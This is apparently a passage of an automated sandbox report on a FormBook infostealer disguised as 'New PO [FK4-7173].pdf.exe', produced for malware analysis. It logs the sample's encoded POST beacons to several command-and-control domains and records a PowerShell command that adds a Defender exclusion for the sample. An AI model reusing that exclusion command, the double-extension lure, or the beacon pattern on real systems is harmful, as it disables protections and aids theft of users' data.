                                                                        Data Ascii: J8LHgDJp=EDr9c0rgzZYsD5Zp12VKZipV5+Rd96ao211uqlgkMlfga82BI+ZgDR9N7Ha+xD/ftn6A/G8czGemZ44aGOAW/qKn2UQ41lNm2aR9aCETNsQcLbMCa5JbeUY6gZ3o9apkfXEfhMJa1s7AeFQJ0aq7tJ7NynB9G8vv42L0zczGgDBN+urWyU5We1dHEAe3T9apcKa4f+noE+RVqTGpLBd2NrdttiAT
                                                                        Nov 9, 2024 05:38:17.845988035 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Date: Sat, 09 Nov 2024 04:38:17 GMT
                                                                        Server: Apache
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        Link: <https://eyecatch.pro/wp-json/>; rel="https://api.w.org/"
                                                                        Content-Encoding: gzip


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        43 | 192.168.2.5 | 50024 | 217.160.0.220 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:38:19.461240053 CET | 1780 | OUT | POST /42c3/ HTTP/1.1
                                                                        Host: www.eyecatch.pro
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 1245
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.eyecatch.pro
                                                                        Referer: http://www.eyecatch.pro/42c3/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp= [TRUNCATED]
                                                                        Nov 9, 2024 05:38:20.392112970 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Date: Sat, 09 Nov 2024 04:38:20 GMT
                                                                        Server: Apache
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        Link: <https://eyecatch.pro/wp-json/>; rel="https://api.w.org/"
                                                                        Content-Encoding: gzip


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        44 | 192.168.2.5 | 50025 | 217.160.0.220 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:38:22.013318062 CET | 488 | OUT | GET /42c3/?J8LHgDJp=JBDdfBWF/aARUf0PyG02RiIz2qli5PW+5nwTlGpfB1DrZY6QfIB5cxII436r+j2NvU2wp2AeqQG6cs1IYMUL87i7oiU5+htQ/rMuVW1JPNoYDo0Ha8BBXEhHg5ia/a4jMw==&aF=JLp4o0Qx2F-p4F HTTP/1.1
                                                                        Host: www.eyecatch.pro
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Nov 9, 2024 05:38:22.966653109 CET | 521 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Date: Sat, 09 Nov 2024 04:38:22 GMT
                                                                        Server: Apache
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        X-Redirect-By: WordPress
                                                                        Location: http://eyecatch.pro/42c3/?J8LHgDJp=JBDdfBWF/aARUf0PyG02RiIz2qli5PW+5nwTlGpfB1DrZY6QfIB5cxII436r+j2NvU2wp2AeqQG6cs1IYMUL87i7oiU5+htQ/rMuVW1JPNoYDo0Ha8BBXEhHg5ia/a4jMw==&aF=JLp4o0Qx2F-p4F
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        45 | 192.168.2.5 | 50026 | 38.47.207.164 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:38:28.385512114 CET | 734 | OUT | POST /fjmy/ HTTP/1.1
                                                                        Host: www.t95yd.top
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 209
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.t95yd.top
                                                                        Referer: http://www.t95yd.top/fjmy/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp=R7hq/FTtQLVJ8mb5hD8YmldBn8nke9K36MuaEFJ65g7SnRAjNXCbzZR4YEdY0iNEDxwaaBt7xDxFkFbdsAGJmenPdkU8WW767uyvbLu3x+tR7OA2HrSIs5QAf5l17KQkfiGaKLohy0Xzj0JEHsF0TrguL+V0b1VdHvsisPnb0pPFF6SantNHgjarxWSY5tc5cJJ6H2I=
                                                                        Nov 9, 2024 05:38:29.319983006 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Sat, 09 Nov 2024 04:38:29 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 138
                                                                        Connection: close
                                                                        ETag: "669534fa-8a"
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        46 | 192.168.2.5 | 50027 | 38.47.207.164 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:38:30.926441908 CET | 754 | OUT | POST /fjmy/ HTTP/1.1
                                                                        Host: www.t95yd.top
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 229
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.t95yd.top
                                                                        Referer: http://www.t95yd.top/fjmy/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp=R7hq/FTtQLVJ8Hr5tF0YgFdOocnkUdL+6MqaEEM9+SfSm0kjMUabgpR4A0ccqSMIDxMoaAB7xDVFkAndrzeWnOnNVEU+Im767uyvbLTQx9dR7fw2GKSLhZQDO5l1/KQgfiG4KOIbyxTzjxtECu93argoWOUaf0Inec0YrfW0kKj8AMjw9PFvzD2ThFavod9QGqZKZhexmgzC3Ag86Cwj0LRtgqSm
                                                                        Nov 9, 2024 05:38:31.881047010 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Sat, 09 Nov 2024 04:38:31 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 138
                                                                        Connection: close
                                                                        ETag: "669534fa-8a"
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        47 | 192.168.2.5 | 50028 | 38.47.207.164 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:38:33.479875088 CET | 1771 | OUT | POST /fjmy/ HTTP/1.1
                                                                        Host: www.t95yd.top
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 1245
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.t95yd.top
                                                                        Referer: http://www.t95yd.top/fjmy/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Nov 9, 2024 05:38:34.422512054 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Sat, 09 Nov 2024 04:38:34 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 138
                                                                        Connection: close
                                                                        ETag: "669534fa-8a"
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        48 | 192.168.2.5 | 50029 | 38.47.207.164 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:38:36.023209095 CET | 485 | OUT | GET /fjmy/?J8LHgDJp=c5JK8yKqbpJXnVX35yNvpk4it4zCfLCuqqKaPXgDxgb5kUsYKBWi9fZhBVM/jAdIGDw0KxxisAN8tQ7jqzqBhav6DGIeWiTI6vrrd/bXxPUrtdAQLIqbusoQJp9p3rxIBg==&aF=JLp4o0Qx2F-p4F HTTP/1.1
                                                                        Host: www.t95yd.top
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Nov 9, 2024 05:38:36.960408926 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Sat, 09 Nov 2024 04:38:36 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 138
                                                                        Connection: close
                                                                        ETag: "669534fa-8a"
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        49 | 192.168.2.5 | 50030 | 13.248.169.48 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:38:42.226252079 CET | 743 | OUT | POST /xlhb/ HTTP/1.1
                                                                        Host: www.sonoscan.org
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 209
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.sonoscan.org
                                                                        Referer: http://www.sonoscan.org/xlhb/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp=bBOknytiAeAy7C4KamNzb4zLNhiPzU4K3fy3+DqoN6Mam0khj/0ulMS3a+2i0UcLjma3MA41JmkczQmmIcO6jfBuW7waVGyo/tbxAI767BthCWP4WDedECQCDlpyIZThpyD/+5gg+ccd3ljM8yYMIYLN8mNFa92ZtfA7CI9Zm4lzpNdxafok5VSfhRmyUYuUNv28Nmg=


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        50 | 192.168.2.5 | 50031 | 13.248.169.48 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:38:44.774008989 CET | 763 | OUT | POST /xlhb/ HTTP/1.1
                                                                        Host: www.sonoscan.org
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 229
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.sonoscan.org
                                                                        Referer: http://www.sonoscan.org/xlhb/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp=bBOknytiAeAy7ioKZFVzKIzMTxiP404O3f+3+BG4MPUamUUh57oupsS3Ou2n+0c6jmXIMEw1JmwczSOmIrjIiPBsNLwYbmyo/tbxAJfQ7B1hClH4WifvYyQBAlpyC5TtpyDn+8B3+ekd3lTM53sDCYKGh2MHSYXRss0nH78T2YddlbsbA9gMq1+nxCuFFoP9XMmMTx39XOft/FqV/RRmkAJpW6iJ


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        51 | 192.168.2.5 | 50032 | 13.248.169.48 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:38:47.383235931 CET | 1780 | OUT | POST /xlhb/ HTTP/1.1
                                                                        Host: www.sonoscan.org
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 1245
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.sonoscan.org
                                                                        Referer: http://www.sonoscan.org/xlhb/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        52 | 192.168.2.5 | 50033 | 13.248.169.48 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:38:49.926085949 CET | 488 | OUT | GET /xlhb/?aF=JLp4o0Qx2F-p4F&J8LHgDJp=WDmEkFMJCPM0vAdoEgsDaI2zUw+I3BUP6f65xhueHOQTowQnu/4Hj56WOua05lBgvGSvVDcmYnsn0HKnK8OdiO87PbUZXBqH6/yEH6S1yhxHCm7aRAizBR0GDl9YCJCE3A== HTTP/1.1
                                                                        Host: www.sonoscan.org
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Nov 9, 2024 05:38:50.598089933 CET | 414 | IN | HTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Sat, 09 Nov 2024 04:38:50 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 274
                                                                        Connection: close
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?aF=JLp4o0Qx2F-p4F&J8LHgDJp=WDmEkFMJCPM0vAdoEgsDaI2zUw+I3BUP6f65xhueHOQTowQnu/4Hj56WOua05lBgvGSvVDcmYnsn0HKnK8OdiO87PbUZXBqH6/yEH6S1yhxHCm7aRAizBR0GDl9YCJCE3A=="}</script></head></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        53 | 192.168.2.5 | 50034 | 156.234.28.94 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:38:56.292984009 CET | 740 | OUT | POST /gv4o/ HTTP/1.1
                                                                        Host: www.jllllbx.top
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 209
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.jllllbx.top
                                                                        Referer: http://www.jllllbx.top/gv4o/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp=IqvrgXGcUbDEgR/f4iv9D4bS6PssoyC3nwo09XYsKl2mJ5LouQUPj38eXVKqhf9753YYlhCp1CRXquz+eFNxe7l9wr9oMQOJ523oXwsL5Ddn0zaOidUY1YWriOmb4muyjjEbr6p/HCU7gKSrKf1HMA5MZEA/WttCnSoHGN/KGcK3xDCRZrXOjrEuLexyW4Eol35KGd0=
                                                                        Nov 9, 2024 05:38:57.244523048 CET | 1135 | IN | HTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Sat, 09 Nov 2024 04:38:57 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        54 | 192.168.2.5 | 50035 | 156.234.28.94 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:38:59.405647993 CET | 760 | OUT | POST /gv4o/ HTTP/1.1
                                                                        Host: www.jllllbx.top
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 229
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.jllllbx.top
                                                                        Referer: http://www.jllllbx.top/gv4o/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Nov 9, 2024 05:39:00.362777948 CET | 1135 | IN | HTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Sat, 09 Nov 2024 04:39:00 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                        55 | 192.168.2.5 | 50036 | 156.234.28.94 | 80
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:39:02.287245989 CET | 1777 | OUT | POST /gv4o/ HTTP/1.1
                                                                        Host: www.jllllbx.top
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 1245
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.jllllbx.top
                                                                        Referer: http://www.jllllbx.top/gv4o/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Nov 9, 2024 05:39:03.235816956 CET | 1135 | IN | HTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Sat, 09 Nov 2024 04:39:03 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip



                                                                        Target ID:0
                                                                        Start time:23:34:53
                                                                        Start date:08/11/2024
                                                                        Path:C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe"
                                                                        Imagebase:0x200000
                                                                        File size:896'000 bytes
                                                                        MD5 hash:F946F99DF4C8406BA19B70561C1D53F6
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:3
                                                                        Start time:23:34:55
                                                                        Start date:08/11/2024
                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe"
                                                                        Imagebase:0xc00000
                                                                        File size:433'152 bytes
                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:4
                                                                        Start time:23:34:55
                                                                        Start date:08/11/2024
                                                                        Path:C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe"
                                                                        Imagebase:0x5f0000
                                                                        File size:896'000 bytes
                                                                        MD5 hash:F946F99DF4C8406BA19B70561C1D53F6
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2215511334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2238337409.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2221565153.00000000015F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:5
                                                                        Start time:23:34:55
                                                                        Start date:08/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:6
                                                                        Start time:23:35:07
                                                                        Start date:08/11/2024
                                                                        Path:C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe"
                                                                        Imagebase:0xfe0000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4473138354.0000000003040000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Target ID:7
                                                                        Start time:23:35:09
                                                                        Start date:08/11/2024
                                                                        Path:C:\Windows\SysWOW64\shutdown.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\SysWOW64\shutdown.exe"
                                                                        Imagebase:0x120000
                                                                        File size:23'552 bytes
                                                                        MD5 hash:FCDE5AF99B82AE6137FB90C7571D40C3
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4473043589.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4472088582.00000000026C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4473189897.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:moderate
                                                                        Has exited:false

                                                                        Target ID:9
                                                                        Start time:23:35:21
                                                                        Start date:08/11/2024
                                                                        Path:C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe"
                                                                        Imagebase:0xfe0000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4475014817.0000000005290000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Target ID:10
                                                                        Start time:23:35:33
                                                                        Start date:08/11/2024
                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                        Imagebase:0x7ff79f9e0000
                                                                        File size:676'768 bytes
                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true


                                                                          Execution Graph

                                                                          Execution Coverage:11.1%
